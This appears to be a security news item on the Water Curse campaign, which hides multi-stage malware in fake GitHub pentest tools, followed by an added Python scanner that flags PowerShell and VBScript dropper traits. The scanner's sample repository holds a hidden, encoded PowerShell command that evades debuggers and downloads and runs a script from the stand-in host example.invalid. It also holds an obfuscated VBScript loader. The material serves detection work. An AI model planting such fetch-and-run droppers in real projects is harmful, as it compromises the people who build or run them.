Security researchers have identified a newly documented threat actor, tracked as Water Curse, that abuses GitHub repositories to distribute malware. The campaign plants seemingly benign penetration-testing tools whose repositories carry malicious payloads built for data theft, remote access and persistence on the victim's system. Infection runs in several stages, driven by obfuscated Visual Basic and PowerShell scripts and protected by anti-debugging measures. Water Curse is assessed to be financially motivated and is linked to credential theft and unauthorized access; the extent of the preparation visible in the repositories points to a deliberate, well-resourced operation.
Cybersecurity researchers have exposed a previously undocumented threat actor, tracked as Water Curse, that relies on weaponized GitHub repositories to deliver multi-stage malware.
The malware enables data exfiltration (including credentials, browser data, and session tokens), remote access, and long-term persistence on infected systems.
Water Curse's arsenal spans a wide range of tools and programming languages, reflecting a cross-functional development capability that the group applies to software supply-chain attacks.
The attacks are also characterized by anti-debugging techniques, privilege-escalation methods and persistence mechanisms that keep a long-term foothold on affected hosts.
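The reporting above describes the delivery pattern (a plausible-looking tool repository whose build or helper scripts launch obfuscated PowerShell or VBScript, with anti-debugging checks in later stages) but gives no indicators. The following Python scanner is an added example, not code from the original article or from the researchers who reported Water Curse. It runs a set of generic obfuscation and staging heuristics over the files of a cloned repository, decodes any base64 `-EncodedCommand` argument it finds (PowerShell expects UTF-16LE there) and re-applies the heuristics to the decoded stage, so a hidden second stage counts toward the file's score. The indicator patterns, the threshold and the sample repository are all constructed for this example, not taken from the campaign.

```python
import base64
import re
from dataclasses import dataclass

# Generic obfuscation / staging heuristics for PowerShell, batch and VBScript
# droppers. These are illustrative patterns written for this example, not
# signatures taken from the Water Curse reporting.
B64_ARG = r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})"
INDICATORS = {
    "encoded_command": re.compile(B64_ARG, re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "exec_policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "anti_debug": re.compile(r"Debugger\]?::IsAttached|CheckRemoteDebuggerPresent|IsDebuggerPresent", re.I),
    "run_key_persistence": re.compile(r"CurrentVersion\\Run", re.I),
    "wscript_shell": re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.I),
    "chr_concat": re.compile(r"(?:Chr\(\d+\)\s*&\s*){3,}", re.I),      # VBScript string building
    "char_concat": re.compile(r"(?:\[char\]\s*\d+\s*\+\s*){3,}", re.I),  # PowerShell equivalent
}


@dataclass
class Finding:
    path: str
    indicators: list[str]
    decoded_stages: list[str]


def decode_encoded_commands(text: str) -> list[str]:
    """Decode every -EncodedCommand argument (base64 of UTF-16LE text) found in text."""
    stages = []
    for m in re.finditer(B64_ARG, text, re.I):
        try:
            stages.append(base64.b64decode(m.group(1), validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # bad padding / alphabet, or not UTF-16LE: not a real encoded command
    return stages


def scan_file(path: str, text: str) -> Finding:
    """Match indicators in the file itself and, one level deep, in any decoded stage."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    stages = decode_encoded_commands(text)
    for stage in stages:
        for name, rx in INDICATORS.items():
            tag = f"stage2:{name}"
            if rx.search(stage) and tag not in hits:
                hits.append(tag)
    return Finding(path, hits, stages)


def scan_repo(files: dict[str, str], threshold: int = 3) -> list[Finding]:
    """Return findings for files carrying at least `threshold` distinct indicators."""
    return [f for f in (scan_file(p, t) for p, t in files.items())
            if len(f.indicators) >= threshold]


# Constructed sample repository (hypothetical, not a real project): a "port
# scanner" whose build scripts drop a hidden, encoded PowerShell stage. The
# second stage is encoded at runtime so the base64 is guaranteed to be correct.
STAGE2 = ("if ([System.Diagnostics.Debugger]::IsAttached) { exit }; "
          "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2.ps1')")
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode("ascii")
SAMPLE_REPO = {
    "README.md": "# PortScan Pro\nFast multithreaded port scanner for pentesters.\n",
    "scanner.py": "import socket\n\ndef scan(host, port):\n    ...\n",
    "build/setup.bat": f"@echo off\npowershell -w hidden -ep bypass -enc {ENCODED}\n",
    "build/loader.vbs": ('Set sh = CreateObject("WScript.Shell")\n'
                         'cmd = Chr(112) & Chr(111) & Chr(119) & Chr(101) & "rshell"\n'
                         'sh.Run cmd & " -w hidden", 0\n'),
}

if __name__ == "__main__":
    for finding in scan_repo(SAMPLE_REPO):
        print(finding.path, sorted(finding.indicators))
        for stage in finding.decoded_stages:
            print("  decoded stage:", stage)
```

Run against a real checkout by building the `files` mapping from a directory walk (read text files, skip binaries). The threshold is deliberately low and the patterns deliberately broad: this is a triage filter to surface files worth a human look, not a verdict, and a legitimate pentest tool will trip some of these indicators on its own.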